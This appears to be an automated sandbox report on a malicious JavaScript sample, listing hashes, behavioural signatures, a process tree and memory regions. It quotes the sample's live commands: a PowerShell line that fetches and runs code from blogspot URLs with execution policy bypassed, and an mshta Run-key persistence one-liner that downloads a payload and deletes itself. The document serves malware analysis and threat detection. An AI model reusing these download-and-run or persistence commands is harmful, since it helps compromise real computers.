Analysis
-
max time kernel
134s -
max time network
115s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
07-05-2024 17:42
Static task
static1
Behavioral task
behavioral1
Sample
b9b4fb770fdb055d474f1a54886bdc380c22afa777a3a0aeaf42a04dcb6a56a8.js
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
b9b4fb770fdb055d474f1a54886bdc380c22afa777a3a0aeaf42a04dcb6a56a8.js
Resource
win10v2004-20240419-en
General
-
Target
b9b4fb770fdb055d474f1a54886bdc380c22afa777a3a0aeaf42a04dcb6a56a8.js
-
Size
1.8MB
-
MD5
fffee7bcbf8f724b68d02ebe0c5a133b
-
SHA1
739696c36214a1a37f382b4da835ba44d2665027
-
SHA256
b9b4fb770fdb055d474f1a54886bdc380c22afa777a3a0aeaf42a04dcb6a56a8
-
SHA512
3f2bd2aa6b5cb22aa0c2042fa3af032c83b55f7e5407344cdb502abaf33b3e42d2e0073540226e6a8f3e09f3495ddbc339bfa29a38e420f11583632aa55fe8f4
-
SSDEEP
768:cNWDuYelMVBbnPOgADSb8O/b64/jWsYOS+Hu8N0RNta7SuHiHwdcU6AH6xgO:JewBbnPOgnh/6OSAuNA6H9AH83
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 7 2664 powershell.exe 8 2664 powershell.exe 20 2664 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation wscript.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule behavioral2/memory/224-28-0x0000000000D10000-0x0000000000D96000-memory.dmp agile_net -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bookignr2 = "mshta \"javascript:tg=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm htlmay5-24.blogspot.com/hehe | iex);Start-Sleep -Seconds 5;','run']; hl=[tg[3],tg[0],tg[1],tg[2]]; new ActiveXObject(hl[2])[hl[0]](hl[3], 0, true);close();new ActiveXObject(hl[1]).DeleteFile(WScript.ScriptFullName);\"\n" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bookignr1 = "schtasks /run /tn Bookignr1" powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 38 api.ipify.org 39 api.ipify.org 40 ip-api.com -
Suspicious use of SetThreadContext 6 IoCs
Processes:
powershell.exedescription pid process target process PID 2664 set thread context of 2716 2664 powershell.exe RegSvcs.exe PID 2664 set thread context of 224 2664 powershell.exe RegSvcs.exe PID 2664 set thread context of 4800 2664 powershell.exe RegSvcs.exe PID 2664 set thread context of 4440 2664 powershell.exe RegSvcs.exe PID 2664 set thread context of 4672 2664 powershell.exe Msbuild.exe PID 2664 set thread context of 4424 2664 powershell.exe Msbuild.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dw20.exedw20.exedw20.exedw20.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
Processes:
dw20.exedw20.exedw20.exedw20.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe -
Suspicious behavior: EnumeratesProcesses 23 IoCs
Processes:
powershell.exeRegSvcs.exepid process 2664 powershell.exe 2664 powershell.exe 2664 powershell.exe 2664 powershell.exe 2664 powershell.exe 2664 powershell.exe 2664 powershell.exe 2664 powershell.exe 2716 RegSvcs.exe 2716 RegSvcs.exe 2716 RegSvcs.exe 2664 powershell.exe 2664 powershell.exe 2664 powershell.exe 2664 powershell.exe 2664 powershell.exe 2664 powershell.exe 2664 powershell.exe 2664 powershell.exe 2664 powershell.exe 2664 powershell.exe 2664 powershell.exe 2664 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exedw20.exeRegSvcs.exedw20.exeRegSvcs.exedw20.exedw20.exedescription pid process Token: SeDebugPrivilege 2664 powershell.exe Token: SeRestorePrivilege 2536 dw20.exe Token: SeBackupPrivilege 2536 dw20.exe Token: SeDebugPrivilege 224 RegSvcs.exe Token: SeBackupPrivilege 1304 dw20.exe Token: SeDebugPrivilege 2716 RegSvcs.exe Token: SeBackupPrivilege 4644 dw20.exe Token: SeBackupPrivilege 1304 dw20.exe Token: SeBackupPrivilege 4644 dw20.exe Token: SeBackupPrivilege 1304 dw20.exe Token: SeBackupPrivilege 4644 dw20.exe Token: SeBackupPrivilege 1304 dw20.exe Token: SeBackupPrivilege 4644 dw20.exe Token: SeBackupPrivilege 1304 dw20.exe Token: SeBackupPrivilege 4644 dw20.exe Token: SeBackupPrivilege 1304 dw20.exe Token: SeBackupPrivilege 4644 dw20.exe Token: SeBackupPrivilege 1304 dw20.exe Token: SeBackupPrivilege 4644 dw20.exe Token: SeBackupPrivilege 1304 dw20.exe Token: SeBackupPrivilege 4644 dw20.exe Token: SeBackupPrivilege 3496 dw20.exe Token: SeBackupPrivilege 2536 dw20.exe Token: SeBackupPrivilege 2536 dw20.exe Token: SeBackupPrivilege 3496 dw20.exe Token: SeBackupPrivilege 3496 dw20.exe Token: SeIncreaseQuotaPrivilege 2664 powershell.exe Token: SeSecurityPrivilege 2664 powershell.exe Token: SeTakeOwnershipPrivilege 2664 powershell.exe Token: SeLoadDriverPrivilege 2664 powershell.exe Token: SeSystemProfilePrivilege 2664 powershell.exe Token: SeSystemtimePrivilege 2664 powershell.exe Token: SeProfSingleProcessPrivilege 2664 powershell.exe Token: SeIncBasePriorityPrivilege 2664 powershell.exe Token: SeCreatePagefilePrivilege 2664 powershell.exe Token: SeBackupPrivilege 2664 powershell.exe Token: SeRestorePrivilege 2664 powershell.exe Token: SeShutdownPrivilege 2664 powershell.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeSystemEnvironmentPrivilege 2664 powershell.exe Token: SeRemoteShutdownPrivilege 2664 powershell.exe Token: SeUndockPrivilege 2664 powershell.exe Token: SeManageVolumePrivilege 2664 powershell.exe Token: 33 2664 powershell.exe Token: 34 2664 powershell.exe Token: 35 2664 powershell.exe Token: 36 2664 powershell.exe Token: SeIncreaseQuotaPrivilege 2664 powershell.exe Token: SeSecurityPrivilege 2664 powershell.exe Token: SeTakeOwnershipPrivilege 2664 powershell.exe Token: SeLoadDriverPrivilege 2664 powershell.exe Token: SeSystemProfilePrivilege 2664 powershell.exe Token: SeSystemtimePrivilege 2664 powershell.exe Token: SeProfSingleProcessPrivilege 2664 powershell.exe Token: SeIncBasePriorityPrivilege 2664 powershell.exe Token: SeCreatePagefilePrivilege 2664 powershell.exe Token: SeBackupPrivilege 2664 powershell.exe Token: SeRestorePrivilege 2664 powershell.exe Token: SeShutdownPrivilege 2664 powershell.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeSystemEnvironmentPrivilege 2664 powershell.exe Token: SeRemoteShutdownPrivilege 2664 powershell.exe Token: SeUndockPrivilege 2664 powershell.exe Token: SeManageVolumePrivilege 2664 powershell.exe -
Suspicious use of WriteProcessMemory 62 IoCs
Processes:
wscript.exepowershell.exeMsbuild.exeRegSvcs.exeMsbuild.exeRegSvcs.exedescription pid process target process PID 4044 wrote to memory of 2664 4044 wscript.exe powershell.exe PID 4044 wrote to memory of 2664 4044 wscript.exe powershell.exe PID 2664 wrote to memory of 2716 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 2716 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 2716 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 2716 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 2716 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 2716 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 2716 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 2716 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 224 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 224 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 224 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 224 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 224 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 224 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 224 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 224 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 4800 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 4800 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 4800 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 4800 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 4800 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 4800 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 4800 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 4800 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 4440 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 4440 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 4440 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 4440 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 4440 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 4440 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 4440 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 4440 2664 powershell.exe RegSvcs.exe PID 2664 wrote to memory of 4672 2664 powershell.exe Msbuild.exe PID 2664 wrote to memory of 4672 2664 powershell.exe Msbuild.exe PID 2664 wrote to memory of 4672 2664 powershell.exe Msbuild.exe PID 2664 wrote to memory of 4672 2664 powershell.exe Msbuild.exe PID 2664 wrote to memory of 4672 2664 powershell.exe Msbuild.exe PID 2664 wrote to memory of 4672 2664 powershell.exe Msbuild.exe PID 2664 wrote to memory of 4672 2664 powershell.exe Msbuild.exe PID 2664 wrote to memory of 4672 2664 powershell.exe Msbuild.exe PID 2664 wrote to memory of 4424 2664 powershell.exe Msbuild.exe PID 2664 wrote to memory of 4424 2664 powershell.exe Msbuild.exe PID 2664 wrote to memory of 4424 2664 powershell.exe Msbuild.exe PID 2664 wrote to memory of 4424 2664 powershell.exe Msbuild.exe PID 2664 wrote to memory of 4424 2664 powershell.exe Msbuild.exe PID 2664 wrote to memory of 4424 2664 powershell.exe Msbuild.exe PID 2664 wrote to memory of 4424 2664 powershell.exe Msbuild.exe PID 2664 wrote to memory of 4424 2664 powershell.exe Msbuild.exe PID 4672 wrote to memory of 1304 4672 Msbuild.exe dw20.exe PID 4672 wrote to memory of 1304 4672 Msbuild.exe dw20.exe PID 4672 wrote to memory of 1304 4672 Msbuild.exe dw20.exe PID 4800 wrote to memory of 2536 4800 RegSvcs.exe dw20.exe PID 4800 wrote to memory of 2536 4800 RegSvcs.exe dw20.exe PID 4800 wrote to memory of 2536 4800 RegSvcs.exe dw20.exe PID 4424 wrote to memory of 4644 4424 Msbuild.exe dw20.exe PID 4424 wrote to memory of 4644 4424 Msbuild.exe dw20.exe PID 4424 wrote to memory of 4644 4424 Msbuild.exe dw20.exe PID 4440 wrote to memory of 3496 4440 RegSvcs.exe dw20.exe PID 4440 wrote to memory of 3496 4440 RegSvcs.exe dw20.exe PID 4440 wrote to memory of 3496 4440 RegSvcs.exe dw20.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\b9b4fb770fdb055d474f1a54886bdc380c22afa777a3a0aeaf42a04dcb6a56a8.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm mainhotel5may.blogspot.com//////////////////////hehehehe) | . iex;Start-Sleep -Seconds 3;2⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7724⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7844⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 6484⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6C19.tmp.xmlFilesize
4KB
MD503935afc7b18018340c90c6becf7000c
SHA1e65dad79ee37becf36d820f209cdfe022233c687
SHA256dfd331453c2c3a9c2e3f049b2ab9732af32b402182ea2cccc085164811089cc5
SHA5126a4201a7ef5a8b851b1a3350a7ed7b0f894fd932cdfa1a67ffb6fc7b07b8007d9003e78548bee9f548dbc00a97deb307a7e6b482a8897a768de649499224a46a
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lf3b3ocb.yvz.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/224-28-0x0000000000D10000-0x0000000000D96000-memory.dmpFilesize
536KB
-
memory/224-30-0x0000000002DE0000-0x0000000002E46000-memory.dmpFilesize
408KB
-
memory/2664-14-0x00007FFCC1640000-0x00007FFCC2101000-memory.dmpFilesize
10.8MB
-
memory/2664-29-0x00007FFCC1640000-0x00007FFCC2101000-memory.dmpFilesize
10.8MB
-
memory/2664-0-0x00007FFCC1643000-0x00007FFCC1645000-memory.dmpFilesize
8KB
-
memory/2664-16-0x000001FFBA520000-0x000001FFBA52E000-memory.dmpFilesize
56KB
-
memory/2664-17-0x000001FFBA550000-0x000001FFBA56A000-memory.dmpFilesize
104KB
-
memory/2664-18-0x000001FFBA540000-0x000001FFBA54A000-memory.dmpFilesize
40KB
-
memory/2664-19-0x000001FFBA570000-0x000001FFBA578000-memory.dmpFilesize
32KB
-
memory/2664-20-0x000001FFBA580000-0x000001FFBA588000-memory.dmpFilesize
32KB
-
memory/2664-21-0x000001FFD2CC0000-0x000001FFD2CC8000-memory.dmpFilesize
32KB
-
memory/2664-65-0x00007FFCC1640000-0x00007FFCC2101000-memory.dmpFilesize
10.8MB
-
memory/2664-12-0x00007FFCC1640000-0x00007FFCC2101000-memory.dmpFilesize
10.8MB
-
memory/2664-13-0x000001FFD30B0000-0x000001FFD3272000-memory.dmpFilesize
1.8MB
-
memory/2664-11-0x00007FFCC1640000-0x00007FFCC2101000-memory.dmpFilesize
10.8MB
-
memory/2664-64-0x00007FFCC1640000-0x00007FFCC2101000-memory.dmpFilesize
10.8MB
-
memory/2664-10-0x000001FFD27D0000-0x000001FFD27F2000-memory.dmpFilesize
136KB
-
memory/2664-63-0x00007FFCC1643000-0x00007FFCC1645000-memory.dmpFilesize
8KB
-
memory/2716-59-0x0000000005F70000-0x0000000006132000-memory.dmpFilesize
1.8MB
-
memory/2716-60-0x0000000006720000-0x00000000067BC000-memory.dmpFilesize
624KB
-
memory/2716-61-0x0000000006820000-0x0000000006870000-memory.dmpFilesize
320KB
-
memory/2716-62-0x0000000006970000-0x000000000697A000-memory.dmpFilesize
40KB
-
memory/2716-31-0x00000000056A0000-0x0000000005C44000-memory.dmpFilesize
5.6MB
-
memory/2716-36-0x00000000050F0000-0x0000000005182000-memory.dmpFilesize
584KB
-
memory/2716-22-0x0000000000400000-0x0000000000486000-memory.dmpFilesize
536KB